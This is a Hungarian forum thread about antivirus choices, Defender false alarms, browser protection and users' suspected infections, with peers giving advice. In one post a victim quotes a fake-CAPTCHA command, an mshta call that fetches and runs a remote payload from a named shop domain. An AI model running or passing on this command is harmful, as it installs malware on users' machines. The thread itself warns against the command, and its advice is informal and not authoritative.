- VoLTE/VoWiFi
- iPhone topik
- Új design és okosabb AI: megjött a Galaxy S25 készülékcsalád
- Okosóra és okoskiegészítő topik
- Poco F6 5G - Turbó Rudi
- Huawei Watch GT 3 Pro - korlátolt szépség
- Mobil flották
- Kínából rendel hajlítható üveget az Apple
- Samsung Galaxy S25 - végre van kicsi!
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
-
Mobilarena
Vírusirtó Topic 2019
Új hozzászólás Aktív témák
-
Új trükköt használnak a lopakodó kártevők. A kiberbűnözők ötletessége nem ismer
határokat: a legújabb rükk az, hogy szándékosan hibás Office-dokumentumokat küldenek: figyelmeztet az AnyRun biztonsági vállalat. A gond az, hogy a vírusirtó felismeri, hogy a fájl hibás, ezért nem is foglalkozik vele – a Word viszont simán kijavítja és megnyitja,
kártevővel együtt.
-
-
-
stuka20
senior tag
A defender folyton likvidálja azt a fájlot, amit nem kellene, tehet tévesen gondolja, hogy az vírus. Az előzményeknél megmondom neki, hogy engedélyezze majd el is végzem a műveletet, de ugyan úgy törli. Berakom kivételek közé a mappát, de azután is törli. Ez ellen milyen megoldás van még?
Kaspersky jó volt, az nem sírt ennyire, viszont a böngészőben letiltott pár webhelyet és nem tudtam feloldalni azt offoltam.
Lehet megnézem az ESET-et. Átlag user vagyok, de figyelek és a kérdőjeles cuccokra rákeresek, ezért nem is nézek bonyolult védelmet. DefenderUI-n sem igazodtam ki, hogy nekem mit kellene abban állítanom. -
grizlisandor
veterán
válasz
grizlisandor #78290 üzenetére
Végül este rápróbáltam megint a Autoruns-ra és az leszedte.
-
válasz
ledgeri #78298 üzenetére
Nem, jelen esetben nem ő nem lát, hanem te. Egyértelmű volt amit borix leírt: Szüksége van az F-Securenak a böngésző bővítményekhez, különben a webes ellenőrzés, stb. elmarad. Pigatt nem akarja vagy nem tetszik neki, de sajnos szükséges az F-Secure működéséhez, mivel az F-Secure nem használ https, ssl vagy bármilyen titkosított kapcsolati ellenőrzést. Tehát, borix helyesen írta le, hogy szükséges, mégha pigatt-nak ez nem is tetszik.
[ Szerkesztve ]
-
ledgeri
nagyúr
válasz
Szellem. #78296 üzenetére
Szóval az, hogy valaki olyat állít ami nem történt meg, az elfogadott. Értem!
// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
borix, ledgeri: Ezt a vitát, légy szíves hagyjátok máshol.
ledgeri: Téged pedig meg szeretnélek kérni, hogy a lekezelő és kioktató stílust itt ebben a topikban mellőzd meg amúgy mindenhol. Köszönöm. -
ledgeri
nagyúr
válasz
pigatt #78283 üzenetére
Általában, ha valaki hasonlóképpen szükségesnek érzi, hogy elmagyarázza egy másik ember gondolatát, miközben nem is érti, hogy a feltett kérdés azért szerepel ott, hogy többet tudjunk/tudjak meg attól/arról a személyról akinek feltesszük (akár valós kérdésként, akár mert ha hogy válaszadásra ösztönözvén átgondolja miért is nem probléma a problémája), az picit illetlen mindkét irányba. Csak annyi közöd volt hozzá, hogy te voltál aktuálisan az alany.
-Az első egyébként is működik
mert figyeli a netforgalmat, csak animációk, meg egyedi hibaoldal-kép nincs benne.
-A bankhasználat egy addon-nélküli privát/inkognitó módos, sütik-nélküli ablak. Ha arra külön, erre belőtt (sütifelejtés kilépéskor, minimum addonok reklám ellen pl) böngészőt használsz 90%-ban ugyanott vagy (sőt most jutott eszembe, hogy nekem korábban volt is olyan bajom, hogy pl számlabefizetésnél, mikor simplepay-re ugrott az alapböngésző, elindult a fenti külön ablak, persze sütik, így használható munkamenet nélkül....),
-Harmadikről nincs emlékem. Többi meg mással is megoldható.// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
válasz
grizlisandor #78287 üzenetére
Az Amsdk.sys a Zemana Antimalware része. Ezeket el kéne távolítani a gépedről és akkor nincs gond.
Semmit nem szívtál be vele. A Google a barátod. -
grizlisandor
veterán
válasz
grizlisandor #78281 üzenetére
Frissült a Windows 24H2-re, onnastól panaszkodik Amsdk.sys-ra, hogy nem tudja betölteni az illesztőprogramot és ahogy olvasom benyaltam valamit, újráznak a EEK és a Hitman Pro, mert a Malwarebyte nem talált semmit.
-
pigatt
őstag
válasz
ledgeri #78282 üzenetére
Ne vitázzatok rajtam, tök felesleges!
Ez a problémám:
Bővítmény nélkül:
Bővítménnyel:
Legalább az első 3 funkció jó lenne ha menne, de ha lehet hinni a UI-nak az nem működik a bővítmény nélkül, de ha fent van a bővítmény akkor nagyon lassú a böngészés.Ezért szeretnék más alternatívát, szerintem kipróbálom az ESET-et 30 napig és meglátom!
i9 / 4080 / 32" / Hall Effect
-
ledgeri
nagyúr
Ezt ti megbeszéltétek onnan tudod? Vagy csak próbálod elmagyarázni, hogy mit jelentett számodra az írása? Mert nekem nem az jött le amit te állítasz!
Nem írta, hogy kell neki kiemelt böngészővédelem (ajánlat-defenderednek van egyáltalán bögészőkieg-dolga?)!
Nem írta, hogy nem akarja kikapcsolni, de a "ettől ... már nagyon szívesen elköszönnék" nem éppen kellemes eggyütt töltött percekre utal, ami pont az ellenkezőjét sejteti.Ha olyasmit írna, hogy "csak a program írja, nem tudom egyébként", akkor helyre tudjuk tenni, hogy az mit is jelent számára. Ha leírja specifikusan, hogy mi kellene neki, akkor meg jobban megértjük konfliktusa helyzetét és akár specifikusabb ajánlatot is kaphat... De ezzől csak ő tud tájékoztatni, mert az övé!
[ Szerkesztve ]
// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
grizlisandor
veterán
válasz
grizlisandor #78275 üzenetére
Azóta sem dobta fel.
-
Shadowra's Big Comparative - Episode 3 Entreprise Antivirus
Itt is a Defender Business verziója nyert.[ Szerkesztve ]
-
ledgeri
nagyúr
válasz
pigatt #78276 üzenetére
Milyen funkciók nem működnek? // Ki lehet a nyavajgását lőni, ha az zavart (én is megtettem, mert nem egy FF fan fent, és nem elégszik meg eggyel)
-
pigatt
őstag
Sziasztok!
Mit ajánlanátok F-Secure helyett? Az előfizetésem hamarosan lejár, és ettől a böngészőbővítménytől már nagyon szívesen elköszönnék. Firefox-ot használok és nagyon lelassítja a böngészést, ha nem telepítem fel akkor pedig nem működnek funkciók.
Én az ESET Home Essential-on gondolkozom, mit gondoltok róla?i9 / 4080 / 32" / Hall Effect
-
válasz
grizlisandor #78273 üzenetére
Tegyél fel egy másik AV-t és nézd meg azzal mit jelez.
Plusz, futtass le Emsisoft Emergenci Kitet, Hitman Pro-t és látod, hogy van e valami a gépen.
Illetve próbáld ki, hogy csak a defender menjen és ne interaktív módba futtasd a Defender UI-t. Én a ConfigureDefendert jobban szeretem. Azt felveszem High-ra, újraindítom a gépet és csókolom. -
grizlisandor
veterán
válasz
grizlisandor #78238 üzenetére
Erre valaki?
-
A reklámblokkoló témával fáradjatok át ebbe a topikba:
[link] -
ledgeri
nagyúr
válasz
nyesteb #78266 üzenetére
Egy dolog, hogy nem követi az irányelveket, más dolog, hogy mik az irányelvek, és hogyan nem követi, és miért.
Ha kell ublock féle védelem, hozzáférés és rugalmasság, akkor brave ha kell chromium, firefox/mullvad ha jó a gecho és okés a firefox féle viselkedés!Mindegyik böngésző ingyenes, bármelyik elfut a másik mellett, próbálgatva őket nem veszítesz semmi!
-
nyesteb
tag
A chrome áruház nem javasolja az ublock origin használatát, ahogy látom. Nem követi az irányelveket. Ezért raktam fel adguardot, de az ublock jobban tetszett. Váltsak böngészőt, hogy működjön?
-
ledgeri
nagyúr
válasz
milan26 #78261 üzenetére
Vagy brave-et, akinek kell a chromium alap és a ublock origin elérhetősége!
-
Teodor52
senior tag
Sziasztok!
Feljebb olvastam, hogy érdemes uBlock Origin telepíteni a böngészőbe.
Kaspersky Standard van telepítve a gépemre és van mellette Kaspersky bővítmény a Chrome böngészőbe ez esetben kell az Origin vagy nem? -
t72killer
titán
Malwarebyte's free-t érdemes még használni? Annak okán jutott eszembe, hogy vettem egy nyitott dobozos SSD-t, értelemszerűen első percben formázom, viszont még arra is szeretnék figyelni, hogy nincs-e a firmware-e mókolva, vagy ilyesmi. Manapság nem lehet eléggé paranoid az ember...
30€ Meta store bónusz Quest headset aktiváláshoz, keress priviben :)
-
FerNandor
őstag
válasz
ledgeri #78246 üzenetére
Köszi és riki
Hát igen, nem is értem magamat. El voltam gondolkodva, meg közben mással is foglalkoztam (multitaskingolni nem tudok) és belesétáltam..
"A shark could swim faster than me, but I could probably run faster than a shark. So in a triathlon, it would all come down to who is the better cyclist."
-
ledgeri
nagyúr
válasz
FerNandor #78243 üzenetére
Ha nem annyira de annyira belakott a gép, én nekiülnék újrarakni... bár horrorfilmesen még ott a mi van ha a külső vinyó
Ha nem találnak a cuccok dolgokat, még az is játszhat, hogy egy-két hónapig úgy próbaüzem, hogy marad az aktuális OS telepítés (hátha az AV adtbázisok frissülnek), de pl bankba, meg ilyesmikre live linuxon lépsz-be.
Hosszabb távon azért egy függetleníthető havi ismételgetett backup-lemez jól jöhet... Vagy csak rászokni nem bármin captcházni ami szembe jön
-
riki
senior tag
-
FerNandor
őstag
válasz
ledgeri #78241 üzenetére
Köszi, lefuttattam mindent, amit küldtél utána, azokat is.
Nem talált semmit.
Nem tudom, most mit csináljak, legyen-e windows újra telepítés.
Amúgy nem tudom, hogy ezt az mshta cuccot egyáltalán tényleg lefuttattam-e. Próbáltam keresni command historyt, de nem jártam túl sok sikerrel..."A shark could swim faster than me, but I could probably run faster than a shark. So in a triathlon, it would all come down to who is the better cyclist."
-
ledgeri
nagyúr
válasz
FerNandor #78240 üzenetére
Azzal megint nem érsz sokat, hogy lefuttatsz egy vírusírtót, de úgy, hoy nincsen rajta minden ami volt, mert így futtathatod újra az egészet mikor rádugod a külsőt!
Most épp kerestem volna rá, hogy miket is ajánlottak korábban itt, de 504-eket kapok, azt sem tudom ez el fog-e menni ha rábökök...// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
FerNandor
őstag
válasz
ledgeri #78239 üzenetére
Köszi. Este lefuttattam az eset online securityt. Avg-t, avastot. Az eset talált pár dolgot a belső hdd-n, amik régi fájloknak tűntek, de szerintem tényleg azok is voltak, azokat elintézte.
Redditen olvasgattam még és elvileg ennél talán a legnagyobb esély arra van, hogy egy backdoort kaptam. Páran pár nappal későbbi Instagram fiók hackelésről írtak... Szóval a vírusirtó elemzések után lementettem a dolgokat. És most majd újratelepítem a windowst.
Malware bytes, bitdefender traffic light amiket olvastam.
Meg valami vírusirtó.
Majd utánanézek, de ha esetleg valaki még ír valamit addig, ami jó, akkor megköszönöm.
Amúgy meg akkor ezek telepítése után dugnám csak rá újra a külső merevlemezt, meg a belsőt is lehúzom majd addig."A shark could swim faster than me, but I could probably run faster than a shark. So in a triathlon, it would all come down to who is the better cyclist."
-
ledgeri
nagyúr
válasz
pigatt #78232 üzenetére
Ha nem kicsomagolod, csak nézelődsz benne, és tényleg csak jpg van benne akkor nagy eséllyel csak az általános "vigyázz zip, vigyázz exe" féle alap óvatosságra késztető cucc...
#78233 FerNandor
Az az OS ne fusson magában (nehogy bekódoljon valamit), amíg nem mentesz,
Linux alól live-pendrive-val, ha nem kódolt a meghajtó tudsz nézelődni, mentegetni, bár előb átnézetném progival.
A külső vinyó legjobb ha mint a belső van kezelve: legyen mentve róla ha lehet, legyen átnézve vírusírtóval, ilyesmik.
Vannak live vírusírtók, amik át tudják nézni a gépet USB-stikről bootolva. Átmennék 1-2vel (voltak említve korábban, lehet,hogy lesznek is, ha valaki jön esetleg hozzáadni valamit)!// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
grizlisandor
veterán
Sziasztok!
Win Defender + DefenderUI interaktív profil + Malwarebytes programokat használok.
A Defender letiltja nem sokkal a gépindítás után a svchost.exe-t egy pár hónapja, de most már meguntam. Google keresés alapján, ha a system32 mappa az elérési útja, akkor az téves riasztás. De akárhogy ütöm a Defendert nem találom, hogy mi a problémája vele, mert ha rákattintok a felugró ablakra, egy üres Defender lapot hoz be. Mit lehet csinálni ezzel? Azon kívül, hogy hozzáadom a figyelmen kívül hagyott fájlnak?
-
pigatt
őstag
válasz
BigBlackDog #78236 üzenetére
Viszont ha egyesével töltöm le a képeket azzal semmi gond nincs, nem jelez a böngésző!
-
FerNandor
őstag
Sziasztok,
Figyelmetlen voltam, és valószínű beszoptam valamit:mshta https:// gabrize.shop/ riiiw1.mp3 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
Captcha-t kellett "megoldani" és nem tudom hogyan, de csináltam, amit írtak... Futtattam ezt. Ahogy futtattam egyből feleszméltem és leszedtem netről a gépet. Azóta offline van.
Kérdés, hogy mit okozhat ez, és hogy tudok megszabadulni tőle?
Nem rég vettem a PC-t és természetesen még vírusirtót nem tettem fel, win 11 pro, eredeti és a defender stb minden engedélyezve van.A képeimet lementeném, de nem tudom, hogy merjek-e külső merevlemezt rádugni.
Utána telepítsek-e valamit, futtassak-e valamit? Vagy win 11 újra telepítés?
Defendert futtattam, de nem talált semmit.Készítem a bootolható usb-t win 11-gyel másik gépen.
Továbbá mit érdemes szerintetek telepíteni, böngészőbe + gépre, ami mondjuk egy ilyennél is beavatkozott volna?
Köszi szépen!!
"A shark could swim faster than me, but I could probably run faster than a shark. So in a triathlon, it would all come down to who is the better cyclist."
-
pigatt
őstag
Sziasztok!
Icloud által generál .zip, ami csak képeket tartalmaz, amiket a telefonommal fotóztam, letöltésekor a Firefox azt jelzi, hogy a fájl rosszindulatú fájlokat, vagy vírust tartalmaz. A fájlt átvizsgálva az F-Secure nem jelzett rá semmit. Más találkozott már ezzel?
-
kiváncsi f..
tag
válasz
Mikulásbá #78229 üzenetére
Nyilván volt valami oka a hibának. Ha nem is úgy jártam el, ahogy kellett volna, azért a hiba megszűnt, a gyári reset óta és a visszaállítás óta sem jelentkezett egyik telon sem.
Talán azért nem omlik rám a ház, kezdek benne hinni!
Beszéltem előtte több "szakértővel". Nem is nagyon tudtak hozzászólni a hibajelenséghez.Azzal is vigasztaltak, hogy valószínűleg hardver hiba okozhatja.
3 napja hibátlan mindegyik.
Az jó alaposan le van írva, hogy mit csináltam rosszul. Megértettem, elbaltáztam.
De hogy pontosan mit, hogyan, milyen sorrendben kellett volna, arról már kevesebb szó esett. Pedig az építő kritikákra, segítő tanácsokra nyitott vagyok, most és eddig is az voltam.
A Pegazus szoftvert meg nem árulják csak úgy.A levelem címzésében utólag látom, hogy rossz helyre ment. ledgeri nagyúrnak szántam elsősorban.
[ Szerkesztve ]
-
ledgeri
nagyúr
válasz
kiváncsi f.. #78224 üzenetére
Ha nem tudod, hogy mi és mikortól fentlévő csinálta, akkor egy biztonságimentés is lehet fertőzött.
Ha nem tudod mi volt, de "ú ez mi lássuk" alapon telepítesz play áruházból, akkor csak az hogy onnan telepítesz megint nem jelent semmit.
Az, hogy mindent egyből átnyomsz, és még valamikor biztonságimentés visszaállítasz kb olyan, mintha "ástuk az alapot, és valami furi szagú votl... de mindegy kellett a ház, így már a tető is kész... de nem kéne szólni valakinek a szag miatt?" szitu lenne...// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
válasz
BigBlackDog #78226 üzenetére
Nálam - is - uBlock Origin van.
-
Cs1csó
titán
válasz
BigBlackDog #78222 üzenetére
+1 Defender, és a szokásos: naprakész minden, böngészőben Ublock O. vagy Adguard, az adatokról külső mentés, szenzitív adatok esetleg titkosított tárolása (zsarolás azok megosztásával is egy mód) pénzügyek kétfaktorosan (bár már ez alap) külső jelszókezelő pl. minimum BitWarden
a webkamerát letakarni használaton kívül, hasonló megoldás mikrofonra (kihúzni) stb.
A védelemnél a RÉTEGESSÉG a lényeg, a több szintűség. -
stuka20
senior tag
válasz
BigBlackDog #78226 üzenetére
uBlock Origin elég
-
kiváncsi f..
tag
Lehet hogy hülyeséget csináltam, de eddig még nem volt szükségem ilyen visszaállításra.
Írtam is, hogy nincs benne tapasztalatom.
Nincs rá bizonyíték, hogy fertőzött volt a rendszer. Mentés előtt rengeteg víruskeresés zajlott. Eset, Kasperky, MSISOFT, Hitman Pro, Super Antispyware, M. Defender, a telefonon Eset. Semmi találat, csupán csak pár nyomkövető süti.
Másfél napja elmúlt, és semmi gyanús eddig.
De még nagyon sok minden nincs beélesítve. Legközelebb majd másképpen csinálom.
Egy fertőzött rendszer mentését biztos nem pakolnám vissza...
Bízom benne hogy nem volt az.
De köszönöm a figyelmeztetést. -
kiváncsi f..
tag
válasz
Szellem. #78216 üzenetére
A biztonsági mentésből történt visszaállítás mind az új , mind a régi telóra. Az appokat még be kell installálni, élesíteni. Azt manuálisan, egyenként fogom megtenni.
Ezek nélkül, majdnem olyan mintha csak a parancsikonja lenne fennt.
Eddig hála Istennek semmi gond egyiknél sem.
Programokat csak a Google Play Áruházból szoktam letölteni.
Köszi, és próbálok az lenni! -
válasz
BigBlackDog #78222 üzenetére
Szerintem a Defender elég, az benne van ugye a Windows-ban. (a böngészőbe "kötelező" egy blokkoló)
-
BigBlackDog
veterán
Sziasztok!
Jelenleg milyen védelem ajánlott;
- otthoni gépre (Windows 10), általános felhasználás mellé, de nem informatikai beállítottságú felhasználónak
- ami ingyenes, vagy egyszeri díjon megvásárolható?Avast volt fent, de utóbbi időben már nagyon idegesítő lett a fizetős verzió reklámozásával és lassította is érezhetően a gépet. Eset Internet Securityval nekem pozitív a tapasztalatom, de ahogy látom, csak előfizetéses rendszerben érhető el.
-
-
Consumer Summary Report 2024 - AV-Comparatives
Product of the year: ESET
[ Szerkesztve ]
-
borix
őstag
válasz
Szellem. #78216 üzenetére
Ez így van.
Volt itt pár jó tanács és én is úgy csinálnám.
Valaki hiába kérdezget lehet neki tanácsokat adni ha közben meg csinálja a hülyeséget.
Egy fertőzött rendszer mentését biztos nem pakolnám vissza...
Így, hogy derül majd ki mi okozhatta ha ismét előjönne?
Tiszta telepítés, felrakni a legszükségesebb dolgokat majd folyamatosan azokat amiket kevésbé használ.
Így ha app okozta lehet viszonyítani. -
válasz
kiváncsi f.. #78215 üzenetére
Ha kártevő okozta a gondot, akkor addig szűnt meg, amig vissza nem telepíted. Ez lehet biztonsági mentésből vagy te telepítesz olyan programot.
A helyzet az, hogy hiába teszel fel vírusírtót androidos telefonra, ugyan az a helyzet mint windowson. Nincs 100%-os védelem.
Szóval körültekintőnek kell lenni nagyon. -
kiváncsi f..
tag
válasz
kiváncsi f.. #78207 üzenetére
Teljesen igaz és logikus is amit írsz. Sajnos minél előbb túl akartam esni ezeken a macerás dolgokon, ezért a bluetooth-os adatátvitelt választottam.
A memória kártyát is csak úgy áttettem, de nem is tudja olvasni, formázását kéri.
Az új telómon eddig minden jó, csak telefonálni nem tudok még rajta.
A SIM kártyákat kell Microról nanóra változtatni. A progik, appok majd ma kerülnek sorra, ezeket mindenképpen manuálisan, egyenként kell beállítgatnom.
Van egy Eset Internet Security licencem, ezen kellene 3 dolognak osztozni. A PC-re vettem, de még nem aktíváltam, mert tart egy próbalicenszem. Addig a telómat őrizte.
Most majd megy fel a gépre. Az új és esetleg a régi telómra mit tegyek szerintetek?
A gyári reset után megszűnt az eddig idegesítő dolog, kérdés véglegesen e? -
.-..-.
junior tag
válasz
Szellem. #78213 üzenetére
Köszönöm, nekem nem volt gondom még vele. Akkor marad.
Azért is kérdeztem, mert pár gépes az előfizetés (én 1-et használok az említett laptopon) és a maradékot a párom szüleinek a gépére használnám el.
AMB Rizen9 5900Z, 32GB B.Skill DDR7 Trident Noe, MiSi B550 Tohamawk, NVidea RXT 4080 Hyper, Smasnug 32' OLED 4k@240Hz, MicraSoft Windoors 11 -> De lehet, hogy átvertek :(
-
-
.-..-.
junior tag
Sziasztok.
Nagyon ritkán használok Windows-t, de most úgy alakult, hogy azt a laptopomat használom amin FSecure van és frissült 19.8 verzióra.
Úgy nézem ez év decemberig él az előfizetés.
Anno elég jónak ítéltem meg, de nem tudom most milyen szinten mozog a védelmük.
Idő közben derült-e ki valami problémás dolog esetleg.Annyi volna a kérdésem, hogy maradhat az FSecure 19.8?
AMB Rizen9 5900Z, 32GB B.Skill DDR7 Trident Noe, MiSi B550 Tohamawk, NVidea RXT 4080 Hyper, Smasnug 32' OLED 4k@240Hz, MicraSoft Windoors 11 -> De lehet, hogy átvertek :(
-
kiváncsi f..
tag
válasz
ledgeri #78208 üzenetére
2021. július 1.-én kapott biztonsági frissítést. Azóta nem. Meg Google Play- rendszerfrissítés: 2023. május 1. Azóta ehhez nincs.
A Microsoft fiókomat átnéztem A-Z, éppen ma hajnalban. Át kell a MF térnrm a 2 faktoros hitelesítésre, esetleg a jelszó cserére. Az Outlookon mindenképpen változtatok jelszót. Meg meggondolandó a Google fiókjaimnál is a jelszócsere.
A saját vírusírtón(ESET S. S. P.) kívül a Kaspersky Remover Tool-al. éa az Emsi Emerganci-val nézettem át. Meg kémprogram keresőkkel. Sehol semmi találat.
Azt azért megjegyezném, hogy az Esetre nem régiben tértem át, előtte a saját Defender ment. Win. 11. Itt is volnának kérdéseim, de azt majd egy másik hszban felteszem.
Mindenkinek nagyon szépen köszönöm a segítségét.
Igen az email kliensek a telon is megtalálhatóak. 3 Google +1 Microsoftos fiók, ill. email cím. Plusz egy Yahoo, de azt nem engedtem szinkronizálni. -
salaud
aktív tag
válasz
kiváncsi f.. #78204 üzenetére
A hekker, vagy ál hekker mindenesetre az outlook email címemről küldött egy levelet saját magamnak a gmailes címemre.
Egy pár megabyte méretű smtp "szerver" progammal olyan email címről küldesz levelet amilyenről csak akarsz. Szerintem cseréld le az a régi telefont és változtass a hotmail és a gmail fiókon is jelszót. Valószínű valami sebezhetőségen keresztül a címlistád szerezte meg a telefonból, egyebet nem.A Linux nem ingyenes. Meg kell fizetni a tanulópénzt. Az emberek 66 százaléka nem tud számolni! Gondoljatok bele, ez majdnem a fele!!
-
Atish19
őstag
válasz
Szorgalmazom a telefon leváltását. Android 10 már nem mai darab akárhogy is nézzük. Gondolom biztonsági frissítést sem mostanában kaptál utoljára. Microsoft fiók biztonsági beállításában meg tudod nézni a bejelentkezett eszközöket? Hátha ott látni valami gyanúsat. Azok alapján amit leírtál ismeri a 2 email címedet és mindkettőről egyértelműen tudja, hogy a tiéd. Ebből arra kövezkeztetek, hogy valóban bent van nálad valahol. Mindkét email kliense megtalálható a telefonodon? Első körben a telefonra gyanakodnék ha a gépedet ilyen alaposan átnézted. Meg ugye amúgy is magában beszél ami alapból gyanús...
Gépedet rescue diskekkel is átnézted? Nem ismerem a Xiaomi rendszerét, de Android 10 alatt már kell lennie valamiféle engedélykezelőnek. Nézd át alaposan melyik alkalmazásnak milyen engedélyeket adtál meg és ebből melyik mikor és mit használt. Egyébként playen is vannak rossz indulatú alkalmazások dögivel szóval ott is csak óvatosan.
[ Szerkesztve ]
Éves Alza+ 20% kedvezmény referencia kód: RrJbRREnazEc
-
ledgeri
nagyúr
válasz
Ha újra térsz át akkor ajánlott mindent manuálisan csinálni, és nem valami appal átküldetni, szinkronizálni a dolgokat! (ekkor azért érdemes még már nem felengedni közös wifi-re a régi telót, ha memóriakártya van benne azt nem csak úgy áttenni, hanem valami külső dolgon törölni, ilyesmik!
-
kiváncsi f..
tag
válasz
kiváncsi f.. #78205 üzenetére
Ebben sajnos én nem vagyok járatos. De van a tágabb családban erre alkalmas személy.
Ettől függetlenül, pár napja rendeltem egy új telefont, holnap mehetek érte a boltba.
Ez miatt a régiről áttelepülök az újra. A réginél egy gyári visszaállítás nem oldja meg a gondokat?
Kicsit szégyenlem magam miatta: [link]
De egy kis segítséggel leesett!
Köszönöm szépen! Akkor ez lesz a megoldás. -
válasz
kiváncsi f.. #78205 üzenetére
Mentsd le a telefonodról az adatokat és egy factory reset neki. Tudom nem kellemes, de ilyenkor ez van.
-
kiváncsi f..
tag
Srácok!
Rámentem a Firefoxban, hogy megnézzem hányas verzió van nálam, erre a telómon elindult a sistergés és a szöveg!
Ez esetleg mond valakinek valamit?
Elvileg frissítenem is kellene 134.0 > 134.0.1 verzióra (64 bites) -
kiváncsi f..
tag
válasz
ledgeri #78203 üzenetére
Nem tudom eldönteni, hogy tényleg feltörték e a Microsoft fiókomat. Onnét nem jött semmi figyelmeztetés.
A hekker, vagy ál hekker mindenesetre az outlook email címemről küldött egy levelet saját magamnak a gmailes címemre. De az Outlook , vagyis a kapcsolódó hotmail fiokom semmit nem jelzett. A másik, hogy a Pegazus kémszoftverhez nem olyan egyszerű hozzájutni. Szerintem kamu lehet az egész. Az ESET-nek is kellett volna jeleznie.
Több fiókom van, szelektálom, hogy melyiket mire használom.
Pár napja már a biztonságos Proton Mailt is telepítettem. A Firefoxban pedig most már a Realyt is használom. Többet nem tudom még mit tehetnék.
A telefonom meg sajnos továbbra is csinálja. De arra sem tudok rájönni, hogy mi indítja be nála. Olyan az egész, mintha egy CB rádióhoz csatlakozna. Pedig nincs tört program, minden a Google Play-ból való. Igaz hogy szinkronizálva vannak a fiokok egymással és a PC-vel is.
Köszönöm a válaszodat! Esetleg, ha valaki még hozzá tudna szólni, nagyon örülnék neki. -
ledgeri
nagyúr
válasz
kiváncsi f.. #78202 üzenetére
Spam levelekben nem ajánlott tudatlanul bármilyen linkre kattintani, mert általában ugyanaz a link van beillesztve mindenhova. Bögészők sarkában ugyanaz jelenik meg mikor föléviszed egynek.Onnantól kezdve meg ugyanaz.
A story-hoz nem tudok egyebet én hozzátenni.
Esetleg, ha csak nem gmailes vagy, ajánlanám a bejelentkezési emailcímet megváltoztatni az emailfiókodon, ha a fiók ezt támogatja, mint egy védelmi faktor, a régi cím megtartásával, ha eddig csak egy cím volt használatban.// #ublockO-HardMode // anti-blockadblock-er // PH! új arculat: 1/ 500 // szeksziboj -nálam van egy pirospontod! // Találtam sárga fényű lézert! (kézit, ceruzaelemest) https://youtu.be/XQnmMjYHgcM //
-
kiváncsi f..
tag
Sziasztok!
Egy számomra furcsa, szokatlan és ismeretlen esettel állok szemben. Megpróbálom érthetően leírni.
A napokban a Spam mappámban (40-50 db érkezik naponta) elolvastam egyet. Próbálgattam már a leiratkozást, az olvasatlan törlést, stb, de sajnos nem lett kevesebb azóta sem. De ez még csak a kisebbik baj lenne.
Amit elolvastam, annak a lényege: Feltörte a Microsoft fiókomat, és átvette az irányítást az egész gépem felett. Írt a Microsoft fiókomból egy emailt, a másik g.mail címemre.
Lehet, hogy akkor nem vettem ezt elég komolyan. Fogtam és a többi spam levelekkel együtt kukáztam. A levélben írta még, hogy megfigyelt a kamerán keresztül a Pegasus kémszoftver segítségével. Talán ez miatt is nem vettem komolyan. Meg nincs is a PC-hez
kamera, sem mikrofon csatlakoztatva. Továbbá látszólag megzsarolt, Bitcoinban kellene fizetnem. A linkekre nem kattintottam. Egyéb fertőzésre utaló nyomokat nem nagyon találtam, csupán csak azt, hogy egy ideje nagyon leterhelt a PC-m memoriája. Meg időnként lefagy a glpem. Alapból az Eset Smart Security a védelmem, mellette még a Kerish Doctor is fent van. Többször végignézettem az egész gépet az Esettel, a Hitman Próval, a Kaspersky Online-vel, az osztrák scannerrel, A super Antispaywerrel és semelyik nem talált semmit sem.
De valaminek lenni kellene elvileg. Mert pár napja a telefonom is fura dolgokat művel.
Úgy kezdődik, hogy jön egy sistergő hang, majd megszólal egy hang ami ezt a szöveget mondja:Nem volt megfelelő katonai erő
ezután újból sistergés, mint amikor valaki rádión állomást keres. Hangfoszlányok, töredékek, majd végül egy kis egész jó minőségű zene.Talán tegnap kezdődött, naponta kb 5-6 x jelentkezik.
Hasonlóban még nem volt részem, nem tudom mi lehet, mi okozhatja. Teljesen tanácstalan vagyok.Mit tudnék még tenni? Amit tettem a telefonomon: A védelem rajta szintén az ESET, fizetős védelme. Átnézettem vele, volt egy teljes biztonsági audit, de semmi. A telom egy Xiaomi, 10-es Androidos, a legfrissebb verzióval. Az FM rádió, gyári app lett kicsit gyanús, lelőni nem tudom, csak kényszerítettem a leállításra. Azóta (1-2 órája) nem jelentkezett.
Szerintetek mi lehet, mit tudnék még tenni? Van e félnivalóm? Aki tud, kérem segítsen! -
Eredeti megjegyzés a videóhoz:
"Az eredeti bypass és a Comodo gyilkosa nem működik, ha a Core elkülönítés megfelelően van konfigurálva a Windows rendszeren.
Továbbá egyik módszer sem fog működni, ha a "Kaspersky Lab" besorolása Ismeretlen értékre van állítva a Fájlminősítés >> szállítók listájában."Szóval, maradjunk annyiban, ez sem tökéletes, mint ahogy egyik termék sem az!
Új hozzászólás Aktív témák
● TILOS a warez!
● Vírusos, vagy egyéb kártevőt tartalmazó linkek a topikban való elhelyezésére vonatkozó szabály:
Tilos a topikban bármilyen vírusos vagy lehetséges vírusos kártevő link elhelyezése.
Az ilyen linkek megosztása csak privátban, PH tagok számára osztható meg.
Ellenkező esetben a hozzászólás törölve lesz.
Állásajánlatok
Cég: Marketing Budget
Város: Budapest